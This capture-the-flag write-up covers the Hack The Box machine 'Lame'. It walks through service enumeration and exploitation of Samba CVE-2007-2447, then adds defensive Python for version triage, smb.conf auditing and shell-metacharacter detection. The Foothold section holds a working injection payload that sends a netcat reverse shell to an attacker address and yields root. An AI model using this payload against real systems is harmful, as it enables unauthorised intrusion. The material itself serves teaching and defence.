Recon
I started with a standard service scan. The box is old — Debian-era services — so I expected unpatched versions and wasn't disappointed.
$ nmap -sC -sV -oN nmap/initial 10.10.10.3
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
# three attack surfaces immediately: FTP anon login, SSH (probably not vulnerable here), and Samba
Four ports worth looking at. FTP accepts anonymous logins, and Samba version 3.0.20 is visible in the banner. SSH on 4.7p1 is old but rarely the intended path on HTB easy boxes. I noted all three attack surfaces and started with FTP.
Enumeration
FTP — vsftpd 2.3.4
Anonymous FTP connected immediately. The directory was empty — nothing to grab. But vsftpd 2.3.4 has a famous backdoor (CVE-2011-2523): a smiley face :) appended to the username triggers a bind shell on port 6200. I tested it.
$ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
# directory listing returns nothing — empty share

$ nc 10.10.10.3 6200
(no response — connection refused)
# backdoor not present — this is a patched or non-vulnerable build. Move on.
Port 6200 never opened. The backdoor was not active. I spent about thirty seconds confirming, then moved to SMB rather than continuing to prod a dead end.
SMB — Samba 3.0.20
Samba 3.0.20 is the exact version range affected by CVE-2007-2447. I listed shares to confirm the service was responding normally.
$ smbclient -L //10.10.10.3/ -N

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
The tmp share with the comment "oh noes!" is a hint, but more importantly the banner confirms Samba 3.0.20-Debian. That version is squarely in the CVE-2007-2447 vulnerable range (3.0.0–3.0.25rc3).
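Pinning the banner to the affected range is the whole point of this enumeration step, and the 139/tcp line shows why an imprecise fingerprint ("3.X - 4.X") is not good enough. The following is an added example, not part of the original writeup, of how a defender's inventory script can turn nmap -sV service lines into an affected / not affected / unknown verdict for this CVE. The four scan lines are constructed from the output above plus two builds at the boundary of the range; the code assumes, as the range 3.0.0 through 3.0.25rc3 implies, that the final 3.0.25 release is the fixed one, so release-candidate suffixes must be parsed rather than ignored.

```python
import re
from typing import List, Optional, Tuple

# Affected range as stated in the writeup: Samba 3.0.0 through 3.0.25rc3.
# Version key = (major, minor, patch, is_final, rc_number), so that 3.0.25rc3 sorts
# below the final 3.0.25 release (which carries the fix) and above 3.0.24.
VersionKey = Tuple[int, int, int, int, int]
VULN_LOW: VersionKey = (3, 0, 0, 0, 0)
VULN_HIGH: VersionKey = (3, 0, 25, 0, 3)

# Matches the version token nmap -sV prints for Samba, e.g. "3.0.20-Debian" or "3.0.25rc3".
VERSION_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")


def parse_samba_version(banner: str) -> Optional[VersionKey]:
    """Return a comparable key for the Samba version in an nmap service line,
    or None when the banner only gives a range such as '3.X - 4.X'."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    if rc is None:
        return (int(major), int(minor), int(patch), 1, 0)   # final release
    return (int(major), int(minor), int(patch), 0, int(rc))  # release candidate


def cve_2007_2447_status(banner: str) -> str:
    """Classify one banner line: 'affected', 'not in affected range', or 'unknown'."""
    v = parse_samba_version(banner)
    if v is None:
        return "unknown"
    return "affected" if VULN_LOW <= v <= VULN_HIGH else "not in affected range"


def triage(scan_lines: List[str]) -> List[Tuple[str, str]]:
    """Map each 'port/proto ...' line to its status; lines without a port are skipped."""
    results = []
    for line in scan_lines:
        fields = line.split()
        if fields and "/" in fields[0]:
            results.append((fields[0], cve_2007_2447_status(line)))
    return results


# Constructed sample: the two Samba lines from the scan above, plus two builds at the
# boundary of the range to show why the rc suffix has to be parsed rather than ignored.
SAMPLE_SCAN = [
    "139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.0.25rc3 (workgroup: WORKGROUP)",
    "445/tcp open  netbios-ssn Samba smbd 3.0.25 (workgroup: WORKGROUP)",
]

if __name__ == "__main__":
    for port, status in triage(SAMPLE_SCAN):
        print(f"{port:<8} {status}")
```

An "unknown" verdict is a prompt to fingerprint further (the smbclient listing above is what resolved it on this box), not a reason to mark the host clean.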
Foothold
CVE-2007-2447 is a pre-auth RCE in Samba's MS-RPC functionality. When the username map script option is configured in smb.conf, Samba passes the supplied username to /bin/sh without sanitizing shell metacharacters. An attacker can inject a backtick subshell directly into the username field of an SMB authentication request and get code execution as whatever user smbd runs as — on this box, that's root.
In short: the username map script hands the supplied username to /bin/sh, so shell metacharacters in the username execute arbitrary commands pre-authentication as the smbd process owner.
I set up a listener and triggered the exploit by injecting a netcat reverse shell into the username field via smbclient. The ./= prefix satisfies the username format check; everything inside the backticks runs in a shell.
# terminal 1 — listener
$ nc -lvnp 4444

# terminal 2 — exploit via username injection
$ smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh 10.10.14.X 4444`'
session setup failed: NT_STATUS_LOGON_FAILURE
# the auth fails but the shell command already ran — check listener

# back in terminal 1
connect to [10.10.14.X] from (UNKNOWN) [10.10.10.3] 37502
id
uid=0(root) gid=0(root) groups=0(root)
Shell arrived as root. The authentication request fails (expected), but the injected command runs before the auth check returns. I also confirmed this works with the Python PoC from amriunix's CVE-2007-2447 repo and with Metasploit's exploit/multi/samba/usermap_script module — same result either way.
Privilege Escalation
None required. smbd was running as root on this box, so the reverse shell arrived as uid=0 directly. There was no privilege boundary to cross.
$ id
uid=0(root) gid=0(root) groups=0(root)
$ hostname
lame
Flags
Lessons Learned
- Don't rabbit-hole on vsftpd 2.3.4 backdoor before confirming port 6200 responds — test fast, then move on. Thirty seconds is enough to discard it.
- Samba 3.0.20 is the vulnerable version for CVE-2007-2447; always fingerprint the exact service version during enum, not just the service name.
- Pre-auth RCE directly to root means no privesc needed — this highlights exactly why SMB version pinning and patching matters in production environments.
- Shell metacharacters in authentication fields are exploitable whenever input reaches /bin/sh unsanitized — this class of bug did not disappear with Samba 3.0.20.
- smbd as root. Samba should run as a dedicated low-privilege service account so that even a successful RCE exploit lands with minimal system access rather than immediate root. Patch or disable the username map script option entirely if not in use.
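The Foothold section explains the mechanism (the username map script option hands the username to /bin/sh) and the last lesson names the fix (disable the option if unused). The following is an added example, not code from the original writeup, that puts both on the defender's side: it audits an smb.conf for the option, strips it as the remediation, and flags auth attempts whose username carries shell metacharacters. The smb.conf and the log lines are constructed for the example; the log line format, the script path and the client address are made up and are not Samba's own log syntax.

```python
import re
from typing import Dict, List, Tuple

# Characters that have no business in a username and are exactly what 'username map
# script' hands to /bin/sh unescaped: backticks, $(...), separators, redirections.
SHELL_META = re.compile(r"[`$;|&<>()\\]")

# Constructed auth-log line format for this example (not Samba's real log syntax):
#   <timestamp> <host> smbd: auth user="<name>" from=<ip> result=<status>
AUTH_LINE = re.compile(r'user="([^"]*)" from=(\S+) result=(\S+)')


def suspicious_username(name: str) -> bool:
    """True if the username contains shell metacharacters."""
    return bool(SHELL_META.search(name))


def scan_auth_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (source ip, username) for every auth attempt whose username looks like
    shell injection, whether or not the auth itself failed: as the writeup notes, the
    command has already run by the time LOGON_FAILURE comes back."""
    hits = []
    for line in lines:
        m = AUTH_LINE.search(line)
        if m and suspicious_username(m.group(1)):
            hits.append((m.group(2), m.group(1)))
    return hits


def _normalise_key(key: str) -> str:
    # Samba accepts option names case-insensitively and ignores whitespace inside them.
    return key.lower().replace(" ", "")


def audit_smb_conf(conf_text: str) -> Dict[str, List[str]]:
    """Report every 'username map script' setting in an smb.conf, by section.
    Assumes the standard INI-style layout: [section] headers, key = value lines,
    and comments only on lines that start with '#' or ';'."""
    findings: Dict[str, List[str]] = {"username_map_script": [], "sections": []}
    section = "(none)"
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            findings["sections"].append(section)
            continue
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if _normalise_key(key) == "usernamemapscript":
            findings["username_map_script"].append(f"[{section}] {key} = {value}")
    return findings


def remove_username_map_script(conf_text: str) -> str:
    """Return the config with every 'username map script' line dropped: the
    'disable it if not in use' remediation from the lessons above."""
    kept = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if "=" in line and line[0] not in "#;" and \
                _normalise_key(line.split("=", 1)[0]) == "usernamemapscript":
            continue
        kept.append(raw)
    return "\n".join(kept)


# Constructed smb.conf; the script path is made up for the example.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
   comment = oh noes!
"""

# Constructed log lines in the format described above; the client addresses are made up.
SAMPLE_LOG = [
    'Jan 01 12:00:01 lame smbd: auth user="alice" from=10.0.0.9 result=NT_STATUS_OK',
    'Jan 01 12:00:02 lame smbd: auth user="./=`id`" from=10.0.0.5 result=NT_STATUS_LOGON_FAILURE',
    'Jan 01 12:00:03 lame smbd: auth user="bob" from=10.0.0.9 result=NT_STATUS_LOGON_FAILURE',
]

if __name__ == "__main__":
    print(audit_smb_conf(SAMPLE_CONF)["username_map_script"])
    print(scan_auth_log(SAMPLE_LOG))
```

The detection deliberately keys on the username rather than on the failure status: a plain failed login from bob is noise, while a backtick in a username is a signal on its own. The audit reports the option per section because Samba only evaluates it from [global], and a stray copy in a share section is still worth removing.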